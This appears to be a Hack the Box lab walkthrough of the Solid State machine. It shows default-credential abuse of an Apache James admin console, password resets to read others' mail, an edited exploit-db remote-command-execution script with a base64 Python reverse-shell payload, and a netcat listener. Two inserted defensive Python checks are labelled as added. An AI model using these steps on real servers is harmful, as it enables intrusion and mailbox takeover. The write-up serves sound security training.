Hack the Box: Solid State Walkthrough

By January 27, 2018 Walkthrough

Hey ya’ll,

Welcome to another Hack the Box walkthrough. Today, we’ll be talking about the newly retired Solid State machine. This was one of the first ones that I was able to do on my own without hints while working on the OSCP, so it’s one that I hold near and dear to my heart. Anyway, enough blabbing, let’s get hacking.

Reconnaissance

First thing we need to do with any new host is scan it and learn more about what services are running on the machine. Let’s run a quick top 100 port scan with nmap. With this, we see:


# Nmap 7.60 scan initiated Tue Jan 9 16:24:07 2018 as: nmap -sS -T4 -sV -oA 00-tcp-top100/top-100 --stats-every 60s --max-retries 3 --defeat-rst-ratelimit --top-ports 100 --script banner --reason solidstate.htb
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up, received echo-reply ttl 63 (0.021s latency).
Not shown: 95 closed ports
Reason: 95 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1
25/tcp open smtp syn-ack ttl 63 JAMES smtpd 2.3.2
| banner: 220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Tue,
|_ 9 Jan 2018 16:24:16 -0500 (EST)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 syn-ack ttl 63 JAMES pop3d 2.3.2
|_banner: +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
119/tcp open nntp syn-ack ttl 63 JAMES nntpd (posting ok)
|_banner: 200 solidstate NNTP Service Ready, posting permitted
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 9 16:24:29 2018 -- 1 IP address (1 host up) scanned in 21.60 seconds

OK, so we see a few things that look interesting: a web port, several email ports, and SSH. It always interests me when multiple services share a related name (here, three JAMES services), since those often present a nice attack surface. Doing a quick Google search, we see something that catches our attention:

Google search for Apache JAMES server exploits

Well that’s nice, the version matches what we found on the server. So let’s dig into this more. Looking into the exploit, we see that it’s an authenticated command execution vulnerability, which is worth being aware of in case we can leverage it anyway. By default, it connects to the target on port 4555 with default credentials of root for both the username and password, as seen below:


...
# (socket, sys and time are imported in the part of the script elided above)
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
    # read and discard the server's reply, then pause briefly
    s.recv(1024)
    time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
...

Let’s take a look at our target and see if port 4555 is open:


root@kali:~# nmap -sS -p4555 -sV --reason 10.10.10.51
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-16 17:03 EST
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up, received echo-reply ttl 63 (0.018s latency).
PORT STATE SERVICE REASON VERSION
4555/tcp open james-admin syn-ack ttl 63 JAMES Remote Admin 2.3.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

Nice! It’s open. Let’s see if we can log in, and if we can, what we can do:


root@kali:~# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
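The admin console dialogue above, written up as an added audit check that is not part of this walkthrough or of the exploit: it drives the James Remote Administration port through the same login / listusers / quit exchange, reports whether the documented default root/root is still accepted, and lists the accounts the server knows about, so a defender can confirm the default was changed and see what a default login exposes. The prompt framing is taken from the transcript; the in-memory mock server (and its "Login failed" wording) is constructed so the check runs offline.

```python
import socket

DEFAULT_LOGIN = ("root", "root")   # the documented James 2.3.2 admin default


def _read_line(conn):
    """Read one CRLF/LF-terminated line; returns '' once the peer has hung up."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = conn.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("latin-1").rstrip("\r\n")


def _read_until(conn, marker):
    """Read until `marker` (bytes) has arrived; the login prompts may not end in a newline."""
    buf = b""
    while marker not in buf:
        chunk = conn.recv(1024)
        if not chunk:
            raise ConnectionError("connection closed before %r arrived" % marker)
        buf += chunk
    return buf.decode("latin-1")


def check_james_admin(conn, login=DEFAULT_LOGIN):
    """Drive the admin dialogue on `conn` (anything with recv/sendall, e.g. a socket).
    Reports the banner, whether `login` was accepted and, if so, what listusers shows.
    Framing follows the transcript above; any reply not starting 'Welcome ' is a rejection."""
    user, password = login
    result = {"banner": None, "login_accepted": False, "accounts": []}
    greeting = _read_until(conn, b"Login id:")
    result["banner"] = greeting.splitlines()[0].strip()
    conn.sendall(user.encode() + b"\n")
    _read_until(conn, b"Password:")
    conn.sendall(password.encode() + b"\n")
    reply = _read_line(conn)
    if reply == "":                       # a stray CRLF left over after the prompt
        reply = _read_line(conn)
    if not reply.startswith("Welcome "):
        return result
    result["login_accepted"] = True
    conn.sendall(b"listusers\n")
    count = int(_read_line(conn).rsplit(None, 1)[1])          # "Existing accounts 5"
    for _ in range(count):
        result["accounts"].append(_read_line(conn).split(":", 1)[1].strip())  # "user: james"
    conn.sendall(b"quit\n")
    return result


def check_james_admin_tcp(host, port=4555, login=DEFAULT_LOGIN, timeout=5.0):
    """Run the check against a live host (only the one supplied login is tried)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return check_james_admin(s, login)


class MockJamesAdmin:
    """Constructed in-memory stand-in for the console, replaying the transcript above."""

    def __init__(self, accounts, valid=DEFAULT_LOGIN):
        self.accounts, self.valid = list(accounts), valid
        self.user, self.state, self.inbuf = None, "login", b""
        self.out = (b"JAMES Remote Administration Tool 2.3.2\r\n"
                    b"Please enter your login and password\r\nLogin id:\r\n")

    def recv(self, n):
        data, self.out = self.out[:n], self.out[n:]
        return data

    def sendall(self, data):
        self.inbuf += data
        while b"\n" in self.inbuf:
            line, self.inbuf = self.inbuf.split(b"\n", 1)
            self._handle(line.decode("latin-1").rstrip("\r"))

    def _handle(self, line):
        if self.state == "login":
            self.user, self.state = line, "password"
            self.out += b"Password:\r\n"
        elif self.state == "password":
            if (self.user, line) == self.valid:
                self.state = "shell"
                self.out += b"Welcome %s. HELP for a list of commands\r\n" % self.user.encode()
            else:                          # failure wording is an assumption, not from the page
                self.state = "closed"
                self.out += b"Login failed for %s\r\n" % self.user.encode()
        elif self.state == "shell" and line == "listusers":
            self.out += b"Existing accounts %d\r\n" % len(self.accounts)
            for name in self.accounts:
                self.out += b"user: %s\r\n" % name.encode()
        elif self.state == "shell" and line == "quit":
            self.state, self.out = "closed", self.out + b"Bye\r\n"
```

A result with `login_accepted` still true after deployment is the finding; the mock exists only so the parsing can be exercised without a James instance.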

Interesting. So we can log in, and there are a few users on the server. This should mean our exploit can at least be sent; whether we can get it to trigger is still a different story. The easiest way to see whether any of the users has email of interest is to manually reset their passwords. Let’s do that, then log in to their mailboxes to see what they have to say:


setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
quit
Bye
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
PASS james
+OK Welcome james
LIST
+OK 0 0
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS thomas
+OK Welcome thomas
LIST
+OK 0 0
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path:
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for ;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a temporary password to login to her accounts.
Thank you in advance.
Respectfully,
James

Interesting. John was told by James that they should send Mindy her password. That could be useful. Let’s look at Mindy’s account:


root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path:
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for ;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path:
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for ;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
.
username: mindy
pass: P@55W0rd1!2@
.
Respectfully,
James
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~#

Wonderful. Now we have credentials. Let’s see if they work on SSH. Maybe we don’t need an exploit!


root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 16 00:55:41 2018 from 10.10.14.15
mindy@solidstate:~$ echo $0
-rbash

OK, looks like we’re in rbash, so we will need to use the exploit after all. Let’s give that a try.

Exploitation

OK, so we have credentials that work over SSH and an exploit. So let’s retrieve https://www.exploit-db.com/exploits/35513/ and fix it for our use.


root@kali:~/Pentest/10.51-solidstate/02-exploitation# searchsploit -m 35513.py
Exploit: Apache James Server 2.3.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/35513/
Path: /usr/share/exploitdb/exploits/linux/remote/35513.py
Copied to: /root/Pentest/10.51-solidstate/02-exploitation/35513.py

Now that we have the file, let’s make some changes. Specifically, we need to configure our payload. Currently, we have this:


payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root

That doesn’t help us. For one, we may not be root, and if we are, we want a shell. Because of that, we want to change our payload. Let’s use msfvenom to build a new one. The following command should work for us:


root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.16 LPORT=4444 SHELL=/bin/bash -a cmd --platform Unix -e generic/none
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 557 (iteration=0)
generic/none chosen with final size 557
Payload size: 557 bytes
python -c "exec('<base64 payload omitted>'.decode('base64'))"

So, with our new payload, let’s put it into the script:


payload = 'python -c "exec(\'aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgICAgIDsgICAgICAgaG9zdD0iMTAuMTAuMTQuMTYiICAgICAgICAgOyAgICAgICBwb3J0PTQ0NDQgICAgICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICwgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7ICAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgIHBvcnQpKSAgICAgICAgIDsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMCkgICAgICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDEpICAgICAgICAgOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAyKSAgICAgICAgIDsgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp\'.decode(\'base64\'))"'

Perfect. Now our exploit is ready, so we run our exploit with:


root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# python fixed-35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Wonderful. Now, let’s start a listener in a different window:

nc -nlvp 4444

Then login to trigger it:

root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <28046011.0.1516203798387.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.16 ([10.10.14.16])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 472
for <../../../../../../../../etc/bash_completion.d@localhost>;
Wed, 17 Jan 2018 10:43:18 -0500 (EST)
Date: Wed, 17 Jan 2018 10:43:18 -0500 (EST)
From: team@team.pl
.
: No such file or directory

and in a listener we can see that we caught a shell!


root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.51] 43640
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Reverse Shell
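Added detection example, not code from the walkthrough or from the exploit: the Delivered-To and Received headers in the login output above name a recipient whose local part is a relative path, which is how the message ended up under /etc/bash_completion.d and got sourced by the login shell. The functions below parse such headers (the two sample messages are constructed from the ones on this page) and flag any recipient whose local part is not a plain account name, which is the check a mail admin would run over the James mail repository or inbound SMTP logs.

```python
import re
from email.parser import Parser

# James 2.3.2 keeps each account's mail in a directory named after the local part,
# so a local part that is a relative path is written wherever that path leads.
# Allowlist: plain dotted account names only (no '/', no '..', no empty labels).
SAFE_LOCALPART = re.compile(r"^[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*$")
RECEIVED_FOR = re.compile(r"\bfor\s+<([^>]+)>")

TRAVERSAL_RCPT = "../../../../../../../../etc/bash_completion.d@localhost"

# Constructed from the headers shown on this page; the 'for <...>' clause of the
# benign message and both bodies are filled in here, not copied from the page.
MAIL_FOR_MINDY = """\
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy, ...
"""

MAIL_FROM_EXPLOIT = """\
Message-ID: <28046011.0.1516203798387.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Delivered-To: %s
Received: from 10.10.14.16 ([10.10.14.16])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 472
          for <%s>;
          Wed, 17 Jan 2018 10:43:18 -0500 (EST)
From: team@team.pl

(payload body omitted)
""" % (TRAVERSAL_RCPT, TRAVERSAL_RCPT)


def is_safe_localpart(local):
    """True for local parts such as 'mindy' or 'first.last'; False for '/', '..' or empty."""
    return bool(SAFE_LOCALPART.match(local))


def recipients_from_headers(raw):
    """Every recipient named by Delivered-To or by a Received 'for <addr>' clause."""
    msg = Parser().parsestr(raw, headersonly=True)
    addrs = [v.strip() for v in msg.get_all("Delivered-To", [])]
    for received in msg.get_all("Received", []):   # folded lines are kept, \s spans them
        m = RECEIVED_FOR.search(received)
        if m:
            addrs.append(m.group(1).strip())
    return addrs


def find_traversal_recipients(raw):
    """Distinct recipient addresses whose local part fails the allowlist, in order seen."""
    flagged = []
    for addr in recipients_from_headers(raw):
        local = addr.rsplit("@", 1)[0]
        if not is_safe_localpart(local) and addr not in flagged:
            flagged.append(addr)
    return flagged


if __name__ == "__main__":
    for name, raw in (("mindy", MAIL_FOR_MINDY), ("exploit", MAIL_FROM_EXPLOIT)):
        print(name, find_traversal_recipients(raw))
```

The same allowlist applied to the adduser command on the admin port would have refused the traversal name before any mail was written.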

Getting our initial foothold

Nice. We have a shell on our target now. Let’s improve our TTY:


python -c 'import pty; pty.spawn("/bin/bash")'

Now we have a pretty good shell. We can improve it a little more:


(keyboard) Ctrl+Z
stty raw -echo
fg
reset

Perfect, we should be able to use things like tab completion now. Much, much better for us.

Privilege Escalation

First thing we need to do is learn a little more about who we are.


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ sudo -l
bash: sudo: command not found
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Hm, no sudo. Odd but good to know. Let’s do a more complete enumeration of the host.


cd /tmp
curl -O http://10.10.14.16/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t -k password

And with this, we get a ton of new information.


#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#
Debug Info
keyword = password
thorough tests = enabled
Scan started at:
Wed Jan 17 12:49:27 EST 2018
### SYSTEM ##############################################
Kernel information:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
Kernel information (continued):
Linux version 4.9.0-3-686-pae (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06)
Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Hostname:
solidstate
### USER/GROUP ##########################################
Current user/group info:
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
Users that have previously logged onto the system:
Username Port From Latest
root pts/1 192.168.11.142 Tue Aug 22 14:04:31 -0400 2017
mindy pts/0 10.10.14.16 Wed Jan 17 12:43:58 -0500 2018
Who else is logged on:
12:49:27 up 2:11, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mindy pts/0 10.10.14.16 12:43 5:29 0.05s 0.03s python -c import pty; pty.spawn("/bin/bash")
Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=106(rtkit) gid=110(rtkit) groups=110(rtkit)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=109(geoclue) gid=115(geoclue) groups=115(geoclue)
uid=110(avahi) gid=117(avahi) groups=117(avahi)
uid=111(colord) gid=118(colord) groups=118(colord)
uid=112(saned) gid=119(saned) groups=119(saned),116(scanner)
uid=113(speech-dispatcher) gid=29(audio) groups=29(audio)
uid=114(pulse) gid=120(pulse) groups=120(pulse),29(audio)
uid=115(hplip) gid=7(lp) groups=7(lp)
uid=116(Debian-gdm) gid=122(Debian-gdm) groups=122(Debian-gdm)
uid=117(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(james) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),114(lpadmin),116(scanner)
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
Super user account(s):
root
./LinEnum.sh: line 240: echo: write error: Broken pipe
./LinEnum.sh: line 249: echo: write error: Broken pipe
Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Aug 22 11:37 .
drwxr-xr-x 22 root root 4.0K Jun 18 2017 ..
drwxr-xr-x 16 james osboxes 4.0K Aug 22 10:20 james
drwxr-x--- 4 mindy mindy 4.0K Sep 8 17:40 mindy
Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py
--w--w--w- 1 root root 0 Jan 17 12:49 /sys/fs/cgroup/memory/cgroup.event_control
World-readable files within /home:
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_logout
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
-rw-r--r-- 1 root root 1001 Aug 22 13:41 /home/mindy/.bashrc
-rw-r--r-- 1 root root 338 Aug 22 13:59 /home/mindy/.bash_profile
-rw-r--r-- 1 james osboxes 220 Jun 18 2017 /home/james/.bash_logout
-rw-r--r-- 1 james osboxes 0 Jun 18 2017 /home/james/.local/share/gnome-settings-daemon/input-sources-converted
-rw-r--r-- 1 james osboxes 21679 Aug 22 10:20 /home/james/.local/share/xorg/Xorg.0.log
-rw-r--r-- 1 james osboxes 21678 Jun 18 2017 /home/james/.local/share/xorg/Xorg.0.log.old
-rw-r--r-- 1 james osboxes 675 Jun 18 2017 /home/james/.profile
-rw-r--r-- 1 james osboxes 3526 Jun 18 2017 /home/james/.bashrc
Home directory contents:
total 28K
drwxr-x--- 4 mindy mindy 4.0K Sep 8 17:40 .
drwxr-xr-x 4 root root 4.0K Aug 22 11:37 ..
-rw-r--r-- 1 root root 0 Aug 22 13:41 .bash_history
-rw-r--r-- 1 root root 0 Aug 22 13:41 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 13:59 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 13:41 .bashrc
drwxr-x--- 2 mindy mindy 4.0K Aug 22 13:45 bin
-rw------- 1 root root 0 Aug 22 13:41 .rhosts
-rw------- 1 root root 0 Aug 22 13:41 .shosts
drw------- 2 root root 4.0K Aug 22 13:41 .ssh
-rw------- 1 mindy mindy 33 Sep 8 17:40 user.txt
Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
Environment information:
SSH_CONNECTION=10.10.14.16 54760 10.10.10.51 22
LANG=en_US.UTF-8
OLDPWD=/home/mindy
XDG_SESSION_ID=48
USER=mindy
PWD=/tmp
HOME=/home/mindy
SSH_CLIENT=10.10.14.16 54760 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mindy
SHELL=/bin/rbash
TERM=xterm-256color
SHLVL=4
LOGNAME=mindy
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
XDG_RUNTIME_DIR=/run/user/1001
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
Path information:
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Current umask value:
0022
u=rwx,g=rx,o=rx
umask value as specified in /etc/login.defs:
UMASK 022
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 May 3 2015 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rw-r--r-- 1 root root 285 May 29 2017 anacron
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 311 May 29 2017 0anacron
-rwxr-xr-x 1 root root 539 Jul 18 2017 apache2
-rwxr-xr-x 1 root root 1474 Jun 1 2017 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
-rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
